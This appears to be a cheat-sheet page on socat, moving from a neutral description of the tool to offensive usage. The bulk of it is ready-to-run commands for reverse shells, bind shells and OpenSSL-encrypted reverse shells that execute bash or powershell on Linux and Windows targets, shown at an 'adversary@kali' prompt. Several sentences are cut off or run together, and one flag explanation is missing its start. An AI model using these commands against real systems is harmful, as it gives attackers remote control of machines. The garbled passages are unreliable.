Socat (for SOcket CAT) establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging and tracing, different modes for interprocess communication and many more options.
It can be used, for example, as a TCP relay (one-shot or daemon), as an external socksifier, as a shell interface to Unix sockets, as an IPv6 relay, as a netcat and rinetd replacement, to redirect TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts inside network connections. Socat supports sctp as of 1.7.0.
Versions for all major platforms are available.
Socat reverse shells
A basic reverse shell listener in
adversary@kali:~# socat TCP-L:<port-number> -
To connect back to the listener on a Linux target system:
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
To connect back to the listener on a Windows target system:
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
Socat bind shells
Set up a listener on a Linux target:
socat TCP-L:<PORT> EXEC:"bash -li"
Set up a listener on a Windows target:
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
pipes argument interfaces between the Unix and Windows ways of handling input and output in a CLI environment.
Regardless of the target machine, connect to the waiting listener with:
socat TCP:<TARGET-IP>:<TARGET-PORT> -
For a fully stable Linux tty reverse shell, use the
Socat encrypted shells
Setting up an OPENSSL-LISTENER using the
tty technique and a PEM file called
adversary@kali:~# openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt adversary@kali:~# cat shell.key shell.crt > encrypt.pem adversary@kali:~# socat OPENSSL-LISTEN:<port-number>,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
Connecting back to this listener from the target machine:
socat OPENSSL:<IP address attack machine>:<port-number>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
ptyallocates a pseudoterminal on the target – part of the stabilisation process
stderrmakes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
Ctrl+Ccommands through into the sub-process, allowing for
killcommands inside the shell
setsidcreates the process in a new session
sanestabilises the terminal, attempting to “normalise” it.